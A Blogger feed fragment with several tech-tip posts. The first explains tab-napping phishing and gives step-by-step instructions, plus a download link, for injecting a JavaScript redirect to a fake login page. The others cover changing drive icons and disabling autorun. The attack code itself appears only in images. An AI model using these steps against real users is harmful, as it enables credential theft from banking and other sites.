&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span style=&quot;font-size: 21px; line-height: 24px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 16pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; line-height: 13.5pt; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWIxt-YFGF7hu95cM60EcUtvSE4LZHOZHEIyDRxVyMBhKilcJNJ1Yu-XS3YpzXInGuUMDtjJ0bXwS0l0iroLQZsoOeYuuTud5HLO89jt1OQTcp9toJuKlQ-No1U-VWvpANh5m-IjV9NDU/s1600/FENSTER_tabnapping_thumb.jpg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;248&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWIxt-YFGF7hu95cM60EcUtvSE4LZHOZHEIyDRxVyMBhKilcJNJ1Yu-XS3YpzXInGuUMDtjJ0bXwS0l0iroLQZsoOeYuuTud5HLO89jt1OQTcp9toJuKlQ-No1U-VWvpANh5m-IjV9NDU/s320/FENSTER_tabnapping_thumb.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;color: #444444; font-family: Arial, sans-serif; font-size: 9pt;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;, serif; font-size: 14pt;&quot;&gt;WHAT IS TAB NAPPING&amp;nbsp; ???&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;
&lt;br /&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;,serif; font-size: small;&quot;&gt;
 Tab napping is new type of phishing scam that does not&amp;nbsp;require&amp;nbsp;you to 
click on any URL to redirect you to the phishing site instead it relies 
on the fact that a lot of people used tabbed browsing(Opening multiple 
tabs while browsing).In tab napping one of your inactive tab is 
automatically replaced by with a new tab without your knowledge.For 
example one of your inactive tab in which you have opened your bank’s 
website will be automatically replaced with the phishing site of your 
bank and you&amp;nbsp;will be asked&amp;nbsp;to enter your Username&amp;nbsp;and password.You might
 think you&amp;nbsp;have been signed&amp;nbsp;out or never logged in but when you will 
enter the details again it&amp;nbsp;will be sent&amp;nbsp;to the hacker.&lt;/span&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=1282681386430893595&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;, serif; font-size: 14pt;&quot;&gt;HOW DOES TAB NAPPING WORKS ???&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;,serif; font-size: small;&quot;&gt;
 Tab napping is more sophisticated than the phishing scams we’ve seen so
 far, and it no longer relies on persuading you to click on a dodgy 
link. Instead it targets Internet users who open lots of tabs on their 
browser at the same time.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;,serif; font-size: small;&quot;&gt;
 How does&amp;nbsp;it work?&amp;nbsp;By replacing an inactive browser tab with a fake page
 set up specifically to obtain your personal data - without you even 
realising it has happened.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;,serif; font-size: small;&quot;&gt;
 Believe it or not, fraudsters can actually detect when a tab has been 
left inactive for a while, and spy on your browser history to find out 
which websites you regularly visit, and therefore which pages to fake.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;,serif; font-size: small;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;, serif; font-size: 16pt;&quot;&gt;Step-By-Step Process&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;span style=&quot;color: red; font-family: &#39;Times New Roman&#39;, serif; font-size: 14pt;&quot;&gt;Note: - I am providing you all things which you need for tab napping&amp;nbsp;&lt;a href=&quot;http://www.mediafire.com/?w69sw8s1is5ju8h&quot; target=&quot;_blank&quot;&gt;Download Now&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;, serif; font-size: 14pt;&quot;&gt;Step 1: - First of&amp;nbsp; all open bgattack file in notepad and the search for window.location = &#39;&amp;lt;Urs Fake Page Link Here&amp;gt;&#39; &lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;, serif; font-size: 14pt;&quot;&gt;and in place of&amp;nbsp; &amp;lt;Urs Fake Page Link Here&amp;gt; put your fake URL.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;, serif; font-size: 14pt;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkg7dqDeLupIHgsT336YN9KS67AdjTCoJ52WhAx9FFAVHznOYqMpcEAK2Ui2XYoiAY5mHfqZ-_o8OGLe0hPa6Tz9eerFfD87HUqn8wCaZtebeLeFn4KXGF-nSpasqOSJ-7x27bkeblQGw/s1600/t1.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkg7dqDeLupIHgsT336YN9KS67AdjTCoJ52WhAx9FFAVHznOYqMpcEAK2Ui2XYoiAY5mHfqZ-_o8OGLe0hPa6Tz9eerFfD87HUqn8wCaZtebeLeFn4KXGF-nSpasqOSJ-7x27bkeblQGw/s320/t1.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;, serif; font-size: 14pt;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;, serif; font-size: 14pt;&quot;&gt;Step 2: - In second step we want to inject our js code in html file.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7MK8sxFJ4FCBL_wAAu1dvuLqgI7WdfymnJsurv5ig3DNNB3KvYKMEvRUe6qqmi0fbebzko1-yM9B8vNCnru-rgjz0q1wfdlPZwmoCsNq1fXxlD2ahWNKuHXZTTWXi_0wopr74uHjA398/s1600/t2.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7MK8sxFJ4FCBL_wAAu1dvuLqgI7WdfymnJsurv5ig3DNNB3KvYKMEvRUe6qqmi0fbebzko1-yM9B8vNCnru-rgjz0q1wfdlPZwmoCsNq1fXxlD2ahWNKuHXZTTWXi_0wopr74uHjA398/s320/t2.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;, serif; font-size: 14pt;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;, serif; font-size: 14pt;&quot;&gt;Step 3: -&amp;nbsp; In step 3 we will put our Bgattack.js Injecting Code &amp;nbsp;in html file.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimhAfF7k7QXuRLcTCQ48jwpvG-d96Azn7jru2N-6-czQPzJHkgnL-LzWSfoElK5_paI2fCUqytathWbZDt5e-bvjQr8B0J7yV1wCZmyRWpnA14YSzIt3Y0jQzvIfzay4g0vTy-0fdFZSI/s1600/t3.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimhAfF7k7QXuRLcTCQ48jwpvG-d96Azn7jru2N-6-czQPzJHkgnL-LzWSfoElK5_paI2fCUqytathWbZDt5e-bvjQr8B0J7yV1wCZmyRWpnA14YSzIt3Y0jQzvIfzay4g0vTy-0fdFZSI/s320/t3.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR9Bhmj6IbRcbBua9aV9yLs7iiqqkICAzNU7_ZzzUu_euvZpoOOZ6SEE7blZUuTqvjzITQRWq1ZOPvDJWvG34HsKIHPSzXbY-50rRmH0PR7Ph0QH3Tfsua3gveHGuWpsPEG6CFMniWMDE/s1600/t4.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR9Bhmj6IbRcbBua9aV9yLs7iiqqkICAzNU7_ZzzUu_euvZpoOOZ6SEE7blZUuTqvjzITQRWq1ZOPvDJWvG34HsKIHPSzXbY-50rRmH0PR7Ph0QH3Tfsua3gveHGuWpsPEG6CFMniWMDE/s320/t4.JPG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;span style=&quot;color: #444444; font-family: &#39;Times New Roman&#39;, serif; font-size: 14pt;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;span style=&quot;color: red; font-family: &#39;Times New Roman&#39;, serif; font-size: 16pt;&quot;&gt;Note: - Tab napping will not work until we will not open new tab.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #F8F8F8; margin-bottom: .0001pt; margin-bottom: 0in; mso-line-height-alt: 13.5pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;color: red; font-family: &#39;Times New Roman&#39;, serif; font-size: 16pt;&quot;&gt;This tutorial is only for education perpose.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red; font-family: &#39;Times New Roman&#39;,serif; font-size: 16pt;&quot;&gt;&lt;span style=&quot;color: black; font-size: small;&quot;&gt;&lt;b&gt;This post is Copied (http://www.hackersrock.in/) &lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/798679630864552149/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/what-is-tab-napping-and-step-by-step.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/798679630864552149'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/798679630864552149'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/what-is-tab-napping-and-step-by-step.html' title='What is tab napping and step-by-step process to create tab napping'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWIxt-YFGF7hu95cM60EcUtvSE4LZHOZHEIyDRxVyMBhKilcJNJ1Yu-XS3YpzXInGuUMDtjJ0bXwS0l0iroLQZsoOeYuuTud5HLO89jt1OQTcp9toJuKlQ-No1U-VWvpANh5m-IjV9NDU/s72-c/FENSTER_tabnapping_thumb.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-1158452443293011645</id><published>2012-05-22T04:50:00.002-07:00</published><updated>2013-09-04T09:49:44.488-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computerz"/><title type='text'>Change a Hard Drive&#39;s Icon</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h1&gt;
&lt;br /&gt;
&lt;/h1&gt;
&lt;div class=&quot;article-byline&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div id=&quot;article-btns&quot;&gt;
&lt;div class=&quot;share-buttons&quot;&gt;
&lt;span class=&quot;slide-google&quot;&gt;
          
              
         &lt;/span&gt;
          
         &lt;span class=&quot;slide-like&quot;&gt;
         &lt;span class=&quot;fb_share_size_Small &quot;&gt;&lt;span class=&quot;FBConnectButton FBConnectButton_Small&quot; style=&quot;cursor: pointer;&quot;&gt;&lt;span class=&quot;FBConnectButton_Text&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;slide-digg&quot;&gt;&lt;span class=&quot;db-wrapper db-clear db-compact&quot;&gt;&lt;span class=&quot;db-container db-submit&quot;&gt;&lt;span class=&quot;db-body db-compact&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;span class=&quot;slide-stumble&quot;&gt;&lt;a href=&quot;http://stumbleupon.com/submit?url=http://www.pcmag.com/article2/0,2817,1847172,00.asp&amp;amp;title=Change+a+Hard+Drive%27s+Icon&quot; name=&quot;stumble&quot;&gt;&lt;/a&gt;
       &lt;/span&gt;
       
&lt;/div&gt;
&lt;/div&gt;
&lt;span style=&quot;float: left; margin: 0pt 10px 0pt 0pt;&quot;&gt; &lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=1282681386430893595&quot;&gt;&lt;img alt=&quot;Change a Hard Drive&quot; border=&quot;0&quot; class=&quot;photo&quot; height=&quot;70&quot; src=&quot;http://www6.pcmag.com/media/images/111604-change-a-hard-drive-s-icon.jpg?thumb=y&quot; width=&quot;120&quot; /&gt; &lt;/a&gt;&lt;/span&gt;
             
            &lt;span id=&quot;intellitxt&quot;&gt;
                &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; I&#39;d like to change the icon for a hard drive on my
 system. I know it&#39;s possible, because one of my disks already has a 
different icon. I must have done it somehow, but I can&#39;t find the tip on
 how to do that.&lt;/b&gt;&lt;br /&gt;

&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;

&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; There are two ways to create a drive-specific icon. The first step 
for both is to determine the full pathname of the file containing the 
icon you want, as well as the index of the icon within that file. To 
view the icons contained in an EXE or DLL file, right-click any shortcut
 that links to a file (as opposed to a system shortcut like My Computer)
 and choose&lt;i&gt; Properties.&lt;/i&gt; On the &lt;i&gt; Shortcut&lt;/i&gt; tab of the resulting dialog, click the &lt;i&gt;Change Icon&lt;/i&gt; button. Click &lt;i&gt;Browse&lt;/i&gt;
 and select the file whose icons you want to peruse. When you find the 
one you want, count off the icons to determine the correct index. Start 
in the top left corner with zero and count down each column, then to the
 right. For example, icon 12 in C:\ Windows\System32\Shell32.dll is a 
picture of a memory chip. Make a note of the full pathname of the file 
and the icon index, then click &lt;i&gt;Cancel,&lt;/i&gt; and &lt;i&gt;Cancel&lt;/i&gt; 
again—you don&#39;t actually want to change that shortcut&#39;s icon. The 
Microsoft Windows files moricons.dll and progman.exe, both found in 
C:\Windows\System32, also contain numerous icons.&lt;br /&gt;

One technique for assigning a drive-specific icon uses a file named 
Autorun.inf in the root directory of that drive. Launch Notepad and 
enter &lt;b&gt;[autorun]&lt;/b&gt; on the first line. Enter &lt;b&gt;ICON=&lt;/b&gt; on the 
second line, followed by the full pathname of the icon-holding file, a 
comma, and the icon index. It might look like this:&lt;br /&gt;

&lt;b&gt;[autorun]&lt;/b&gt;&lt;br /&gt;

&lt;br /&gt;
&lt;b&gt;ICON=C:\WINDOWS\SYSTEM\SHELL32.DLL,12&lt;/b&gt;&lt;br /&gt;

Save the file as &quot;C:\autorun.inf&quot; (you need the quotes to prevent 
Notepad from appending the .txt extension). Now restart the computer. 
When you open Windows Explorer, the drive should display its new icon.&lt;br /&gt;

The other technique involves editing the Registry. Launch RegEdit from the &lt;i&gt;Start &lt;/i&gt; menu&#39;s &lt;i&gt;Run&lt;/i&gt; dialog and navigate to &lt;b&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\&lt;br /&gt;CurrenTVersion\Explorer.&lt;/b&gt; If a subkey named &lt;b&gt;driveicons&lt;/b&gt; is present, open it; if not, right-click in the right-hand pane, select &lt;i&gt;New&lt;/i&gt; | &lt;i&gt;Key&lt;/i&gt; and name the key &lt;i&gt;driveicons&lt;/i&gt;. Under the &lt;b&gt;driveicons&lt;/b&gt; key, find or create a subkey named &lt;b&gt;C&lt;/b&gt; (or the letter of the drive whose icon you want to change). And under this &lt;b&gt;C&lt;/b&gt; key find or create a subkey named &lt;b&gt;DefaultIcon.&lt;/b&gt;
 Double-click the (Default) entry in the right-hand pane and set its 
value to the full pathname of the icon-holding file, a comma, and the 
icon index. Again you&#39;ll need to restart Windows.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;

If one of these techniques seems not to work for you, try the other. 
If you apply both to the same drive, the Autorun.inf file takes 
precedence.&lt;br /&gt;



   &lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/1158452443293011645/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/change-hard-drives-icon.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1158452443293011645'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1158452443293011645'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/change-hard-drives-icon.html' title='Change a Hard Drive&#39;s Icon'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-6823407289318353492</id><published>2012-05-21T13:39:00.001-07:00</published><updated>2013-09-04T09:49:44.546-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computerz"/><title type='text'>Disable Auto Execution of Autorun.inf</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;postContent&quot;&gt;
&lt;br /&gt;
&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; If you have&lt;/span&gt; come across pen drive viruses then you must have seen this file called &lt;strong&gt;Autorun.inf&lt;/strong&gt;.&lt;br /&gt;
This is a file that &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;stores&lt;/span&gt; the instructions to be carried when you double click your &lt;strong&gt;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;USB drive&lt;/span&gt; &lt;/strong&gt;which in turn leads to the execution of the virus stored there.&lt;br /&gt;
&lt;br /&gt;

&lt;img alt=&quot;&quot; class=&quot;aligncenter size-full wp-image-1851&quot; height=&quot;119&quot; src=&quot;http://techsalsa.com/wp-content/uploads/2009/07/autorun-inf.jpg&quot; title=&quot;autorun-inf&quot; width=&quot;95&quot; /&gt;&lt;br /&gt;

&lt;br /&gt;
However you can prevent the most of the &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot;&gt;computer&lt;/span&gt;
 virus to spread if you disable the autorun.inf file to execute 
automatically. Well if you are thinking if this can be done easily by 
turning off &lt;strong&gt;autoplay &lt;/strong&gt;feature then the file can still be executed if the pen drive is opened.&lt;span id=&quot;more-2005&quot;&gt;&lt;/span&gt;&lt;br /&gt;

&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Steps:&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;

1. We can make the computer to stop executing the autorun.inf file by some registry changes.&lt;br /&gt;

&lt;br /&gt;
2.&amp;nbsp; Just download the &lt;a href=&quot;http://techsalsa.com/wp-content/uploads/2009/08/disable-autorun.zip&quot;&gt;&lt;strong&gt;reg &lt;/strong&gt;&lt;/a&gt;file from here and merge it in the registry by clicking on Yes in the &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD1&quot;&gt;confirmation&lt;/span&gt; prompt.&lt;br /&gt;

&lt;br /&gt;
&lt;br /&gt;
What this does is it tells the system that the file named Autorun.inf
 does not exist and thus can’t be opened on its own. However if you need
 to open it then you have to do this manually using the Notepad.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;

&lt;/div&gt;
&lt;ins style=&quot;border: none; display: inline-table; height: 15px; margin: 0; padding: 0; position: relative; visibility: visible; width: 468px;&quot;&gt;&lt;ins id=&quot;aswift_3_anchor&quot; style=&quot;border: none; display: block; height: 15px; margin: 0; padding: 0; position: relative; visibility: visible; width: 468px;&quot;&gt;&lt;/ins&gt;&lt;/ins&gt;


&lt;br /&gt;





&lt;b&gt;If you liked this article, then do click the share button below to recommend to others.
&lt;/b&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/6823407289318353492/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/disable-auto-execution-of-autoruninf.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/6823407289318353492'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/6823407289318353492'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/disable-auto-execution-of-autoruninf.html' title='Disable Auto Execution of Autorun.inf'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-1332330009253321647</id><published>2012-05-21T13:25:00.000-07:00</published><updated>2013-09-04T09:49:44.496-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computerz"/><title type='text'>Change Default Drive Icon of USB Pen Drive</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Tired of seeing the same old boring &lt;strong&gt;drive icon &lt;/strong&gt;when you insert your &lt;strong&gt;USB pen drive &lt;/strong&gt;in the &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot;&gt;computer&lt;/span&gt; ??&lt;br /&gt;
&lt;br /&gt;
Here is a simple and easy trick that will bring life to the icon you see whenever you insert your drive.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;

&lt;img alt=&quot;&quot; class=&quot;alignleft size-full wp-image-1319&quot; height=&quot;49&quot; src=&quot;http://techsalsa.com/wp-content/uploads/2009/04/default_icon_pd.jpg&quot; title=&quot;default_icon_pd&quot; width=&quot;274&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaCzeWAE0osxThApjHIoRA1Q-bLX_OmvKSTG0wXwSblP_FP0NVqmG_QI_pO1jJF4MBeh2KNDN_3IMGZmsx9iUs6MQzDiS3e0zk10T10MGPlqW-xEit8y3BtIvStO6F_VYqzPWdziy2EiY/s1600/changed_icon_pd.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaCzeWAE0osxThApjHIoRA1Q-bLX_OmvKSTG0wXwSblP_FP0NVqmG_QI_pO1jJF4MBeh2KNDN_3IMGZmsx9iUs6MQzDiS3e0zk10T10MGPlqW-xEit8y3BtIvStO6F_VYqzPWdziy2EiY/s1600/changed_icon_pd.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;

&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;

&lt;br /&gt;
&lt;br /&gt;
The trick is very easy and you can put any pic of yours to the icon of your drive.&lt;br /&gt;

&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;&lt;span style=&quot;color: black;&quot;&gt;What you need&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;

•&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD1&quot;&gt;USB drive&lt;/span&gt;&lt;span id=&quot;more-1318&quot;&gt;&lt;/span&gt;&lt;br /&gt;

